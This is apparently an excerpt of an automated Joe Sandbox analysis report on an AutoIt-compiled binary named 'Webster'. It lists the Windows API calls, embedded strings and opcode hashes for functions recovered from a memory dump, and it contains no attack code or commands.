                                                                                  • Opcode Fuzzy Hash: 8e09a0afe9f8385a5d69fde51639adee5613eacb3ba7ab77e12ec6aaaf9c9f93
                                                                                  • Instruction Fuzzy Hash: 4361DA30164601DFCB25BF15CD48B7AB7F1FB41322F508929E4824BAA1CBB1AD90DFA0
                                                                                  APIs
                                                                                    • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                                                  • GetSysColor.USER32(0000000F), ref: 00A825AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorLongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 259745315-0
                                                                                  • Opcode ID: 9e402e4772f67a47f6915ac3a53356ce83794a34025210f8b5387e9244d7af9d
                                                                                  • Instruction ID: 0677e9830392cd669a9e1d844be19174304c5cffbde23065dee6903d350382a8
                                                                                  • Opcode Fuzzy Hash: 9e402e4772f67a47f6915ac3a53356ce83794a34025210f8b5387e9244d7af9d
                                                                                  • Instruction Fuzzy Hash: B641D331000144AFDB247F289C88BF93B66FB0A331F584265FD669B1E6EB748D81DB21
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A92A3E,?,00008000), ref: 00AA0BA7
                                                                                    • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A92ADF
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A92C2C
                                                                                    • Part of subcall function 00A93EBE: _wcscpy.LIBCMT ref: 00A93EF6
                                                                                    • Part of subcall function 00AA386D: _iswctype.LIBCMT ref: 00AA3875
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                  • API String ID: 537147316-3738523708
                                                                                  • Opcode ID: 042513bd0a5227504a92755ff8d797cf312849e845c43ecade19f14e87c70556
                                                                                  • Instruction ID: 1874e6b1860507ebccfc4c52fc94275e3d4228f81597712d39478b6c76928b74
                                                                                  • Opcode Fuzzy Hash: 042513bd0a5227504a92755ff8d797cf312849e845c43ecade19f14e87c70556
                                                                                  • Instruction Fuzzy Hash: DD027031208341AFCB24EF24C991EAFBBF5AF99354F10491DF496972A2DB30D949CB52
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?,00B10980), ref: 00AEAF4E
                                                                                  • GetDriveTypeW.KERNEL32(00000061,00B3B5F0,00000061), ref: 00AEB018
                                                                                  • _wcscpy.LIBCMT ref: 00AEB042
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                  • API String ID: 2820617543-1000479233
                                                                                  • Opcode ID: 8e4236369f8198b05c28735d46c0b51bad1df232adb2d97a8f87f05154b4fe66
                                                                                  • Instruction ID: e5123d016a4c9ac1416e57fe098715c425022d461096a7d9a302712894c5bea9
                                                                                  • Opcode Fuzzy Hash: 8e4236369f8198b05c28735d46c0b51bad1df232adb2d97a8f87f05154b4fe66
                                                                                  • Instruction Fuzzy Hash: 6451CC722183469FC710EF15CA91AABB7E5EFA4300F60481DF596472A2EB30ED09CB52
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __i64tow__itow__swprintf
                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                  • API String ID: 421087845-2263619337
                                                                                  • Opcode ID: ea2d92c5ebc830d5c9b4cad0b92703cb13b581556d8ee5b0db0b793ec6c3738e
                                                                                  • Instruction ID: 647a189cb234ec2b06067beb98cd595d71b373eb044ca6de6025f06d3c68e0db
                                                                                  • Opcode Fuzzy Hash: ea2d92c5ebc830d5c9b4cad0b92703cb13b581556d8ee5b0db0b793ec6c3738e
                                                                                  • Instruction Fuzzy Hash: 3941B37160420AAFEB24EF78D941EAA77F8EB49340F20446EE549D7292EB3199418710
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00B0778F
                                                                                  • CreateMenu.USER32 ref: 00B077AA
                                                                                  • SetMenu.USER32(?,00000000), ref: 00B077B9
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B07846
                                                                                  • IsMenu.USER32(?), ref: 00B0785C
                                                                                  • CreatePopupMenu.USER32 ref: 00B07866
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B07893
                                                                                  • DrawMenuBar.USER32 ref: 00B0789B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                  • String ID: 0$F
                                                                                  • API String ID: 176399719-3044882817
                                                                                  • Opcode ID: 7c7c8e5d684bb453cdf060b7f4e8d1851c4219e1ae8c4d84478cca2e3ed7aeec
                                                                                  • Instruction ID: 8ddbb137d1f5af91eab640bffacb3079460eb9982a7cfa22b7d0da5128e8da6e
                                                                                  • Opcode Fuzzy Hash: 7c7c8e5d684bb453cdf060b7f4e8d1851c4219e1ae8c4d84478cca2e3ed7aeec
                                                                                  • Instruction Fuzzy Hash: 8F413974A00209EFDB10DF65D888A9ABBF5FF49310F1485A9F945A7390DB70AD10CF50
                                                                                  APIs
                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B07B83
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00B07B8A
                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B07B9D
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00B07BA5
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B07BB0
                                                                                  • DeleteDC.GDI32(00000000), ref: 00B07BB9
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B07BC3
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B07BD7
                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B07BE3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                  • String ID: static
                                                                                  • API String ID: 2559357485-2160076837
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AA706B
                                                                                    • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                                                  • __gmtime64_s.LIBCMT ref: 00AA7104
                                                                                  • __gmtime64_s.LIBCMT ref: 00AA713A
                                                                                  • __gmtime64_s.LIBCMT ref: 00AA7157
                                                                                  • __allrem.LIBCMT ref: 00AA71AD
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA71C9
                                                                                  • __allrem.LIBCMT ref: 00AA71E0
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA71FE
                                                                                  • __allrem.LIBCMT ref: 00AA7215
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA7233
                                                                                  • __invoke_watson.LIBCMT ref: 00AA72A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                  • String ID:
                                                                                  • API String ID: 384356119-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE2CE9
                                                                                  • GetMenuItemInfoW.USER32(00B47890,000000FF,00000000,00000030), ref: 00AE2D4A
                                                                                  • SetMenuItemInfoW.USER32(00B47890,00000004,00000000,00000030), ref: 00AE2D80
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00AE2D92
                                                                                  • GetMenuItemCount.USER32(?), ref: 00AE2DD6
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00AE2DF2
                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00AE2E1C
                                                                                  • GetMenuItemID.USER32(?,?), ref: 00AE2E61
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AE2EA7
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2EBB
                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2EDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4176008265-0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B075CA
                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B075CD
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B075F1
                                                                                  • _memset.LIBCMT ref: 00B07602
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B07614
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B0768C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 830647256-0
                                                                                  APIs
                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AD77DD
                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00AD7836
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AD7848
                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AD7868
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00AD78BB
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AD78CF
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AD78E4
                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00AD78F1
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD78FA
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AD790C
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD7917
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                  • String ID:
                                                                                  • API String ID: 2706829360-0
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00AE0530
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00AE05B1
                                                                                  • GetKeyState.USER32(000000A0), ref: 00AE05CC
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00AE05E6
                                                                                  • GetKeyState.USER32(000000A1), ref: 00AE05FB
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00AE0613
                                                                                  • GetKeyState.USER32(00000011), ref: 00AE0625
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00AE063D
                                                                                  • GetKeyState.USER32(00000012), ref: 00AE064F
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00AE0667
                                                                                  • GetKeyState.USER32(0000005B), ref: 00AE0679
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • CoInitialize.OLE32 ref: 00AF8AED
                                                                                  • CoUninitialize.OLE32 ref: 00AF8AF8
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00B13BBC,?), ref: 00AF8B58
                                                                                  • IIDFromString.OLE32(?,?), ref: 00AF8BCB
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AF8C65
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AF8CC6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                  • API String ID: 834269672-1287834457
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00AEBB13
                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AEBB89
                                                                                  • GetLastError.KERNEL32 ref: 00AEBB93
                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00AEBC00
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                  • API String ID: 4194297153-14809454
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AD9BCC
                                                                                  • GetDlgCtrlID.USER32 ref: 00AD9BD7
                                                                                  • GetParent.USER32 ref: 00AD9BF3
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AD9BF6
                                                                                  • GetDlgCtrlID.USER32(?), ref: 00AD9BFF
                                                                                  • GetParent.USER32(?), ref: 00AD9C1B
                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AD9C1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1536045017-1403004172
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AD9CB5
                                                                                  • GetDlgCtrlID.USER32 ref: 00AD9CC0
                                                                                  • GetParent.USER32 ref: 00AD9CDC
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AD9CDF
                                                                                  • GetDlgCtrlID.USER32(?), ref: 00AD9CE8
                                                                                  • GetParent.USER32(?), ref: 00AD9D04
                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AD9D07
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1536045017-1403004172
                                                                                  • Opcode ID: d020fb602625e2d311dbe3565e4c408f49d8fb87b82e2800cdf7ff0c9eca5bad
                                                                                  • Instruction ID: f247a370841d67b0fb90f1ea3f48909e1796174b22da7d939d9f908b0a5e4dbf
                                                                                  • Opcode Fuzzy Hash: d020fb602625e2d311dbe3565e4c408f49d8fb87b82e2800cdf7ff0c9eca5bad
                                                                                  • Instruction Fuzzy Hash: 3921D075E40204BFDF00ABA0CC85EFEBBB9EF94300F604016F952A32A1DF758965DA20
                                                                                  APIs
                                                                                  • GetParent.USER32 ref: 00AD9D27
                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00AD9D3C
                                                                                  • _wcscmp.LIBCMT ref: 00AD9D4E
                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AD9DC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                  • API String ID: 1704125052-3381328864
                                                                                  • Opcode ID: 8fa8534afea0323c0a63ee4e620672590a5e5cd8d3acef3463aa755b34464b04
                                                                                  • Instruction ID: 602846d95fc27d3fe08d05ff1d7ebdf5512929c3cc367e3a4f3f6d01b567e304
                                                                                  • Opcode Fuzzy Hash: 8fa8534afea0323c0a63ee4e620672590a5e5cd8d3acef3463aa755b34464b04
                                                                                  • Instruction Fuzzy Hash: FD112977248302BAFE002724EC06DE773EDDB19720F304167FA42A61E1FFA5AE515951
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AF8FC1
                                                                                  • CoInitialize.OLE32(00000000), ref: 00AF8FEE
                                                                                  • CoUninitialize.OLE32 ref: 00AF8FF8
                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00AF90F8
                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AF9225
                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B13BDC), ref: 00AF9259
                                                                                  • CoGetObject.OLE32(?,00000000,00B13BDC,?), ref: 00AF927C
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00AF928F
                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AF930F
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AF931F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 2395222682-0
                                                                                  • Opcode ID: 80c88fc61d0f37c145037963ff4af728363e610c1478e7d7f27f2b965612fdce
                                                                                  • Instruction ID: 7aa17d8429b8a648fe287459863f3db9e709064e2e4d59c0856b1cefaaf47f17
                                                                                  • Opcode Fuzzy Hash: 80c88fc61d0f37c145037963ff4af728363e610c1478e7d7f27f2b965612fdce
                                                                                  • Instruction Fuzzy Hash: 06C13971608309AFC700EF68C884A6BB7E9FF89748F00495DF68A9B251DB71ED45CB52
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00AE19EF
                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A03
                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00AE1A0A
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A19
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE1A2B
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A44
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A56
                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A9B
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1AB0
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1ABB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                  • String ID:
                                                                                  • API String ID: 2156557900-0
                                                                                  • Opcode ID: b86bf92fdc7729e679b368a6dca7b33fc441235eb5cf539d04630c883406b489
                                                                                  • Instruction ID: f28ed71d283426c6876d3f16e8fbe015d10f3e20a17b05f464b0d3a538d66940
                                                                                  • Opcode Fuzzy Hash: b86bf92fdc7729e679b368a6dca7b33fc441235eb5cf539d04630c883406b489
                                                                                  • Instruction Fuzzy Hash: 0231EE79611254BFEB20AF11DC88FBD37AAFB56399F908125F800C7190CFB49E848B20
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 00A8260D
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00A82617
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00A8262C
                                                                                  • GetStockObject.GDI32(00000005), ref: 00A82634
                                                                                  • GetClientRect.USER32(?), ref: 00ABC0FC
                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00ABC113
                                                                                  • GetWindowDC.USER32(?), ref: 00ABC11F
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00ABC12E
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00ABC140
                                                                                  • GetSysColor.USER32(00000005), ref: 00ABC15E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3430376129-0
                                                                                  • Opcode ID: 53965652112e65e16fe060db4b7d515dc4a22f9cca117dd83a982178730d7582
                                                                                  • Instruction ID: 6c8ce6449cb824b1470042c96f1ee9f606bbca0ba730e6fa0b904e5e5e26206d
                                                                                  • Opcode Fuzzy Hash: 53965652112e65e16fe060db4b7d515dc4a22f9cca117dd83a982178730d7582
                                                                                  • Instruction Fuzzy Hash: 28116D31510205FFDB616FA4EC48BE97BB6EB14331F508225FA65A60E1CFB10A91EF10
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A8ADE1
                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00A8AE80
                                                                                  • UnregisterHotKey.USER32(?), ref: 00A8AFD7
                                                                                  • DestroyWindow.USER32(?), ref: 00AC2F64
                                                                                  • FreeLibrary.KERNEL32(?), ref: 00AC2FC9
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AC2FF6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                  • String ID: close all
                                                                                  • API String ID: 469580280-3243417748
                                                                                  • Opcode ID: b0cf276d48b197a67e7ae36e8bbdf377f0df097a925881df2b2ed69f36b54d84
                                                                                  • Instruction ID: 4e84b5c44b242d32c18d6d673aa6f4ba811e96c8fabb4b06b7c38bc6221c013c
                                                                                  • Opcode Fuzzy Hash: b0cf276d48b197a67e7ae36e8bbdf377f0df097a925881df2b2ed69f36b54d84
                                                                                  • Instruction Fuzzy Hash: 83A16A317012228FDB29EF14C594F69F3B4BF14700F5582ADE90AAB261DB31AD52CF91
                                                                                  APIs
                                                                                  • EnumChildWindows.USER32(?,00ADB13A), ref: 00ADB078
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
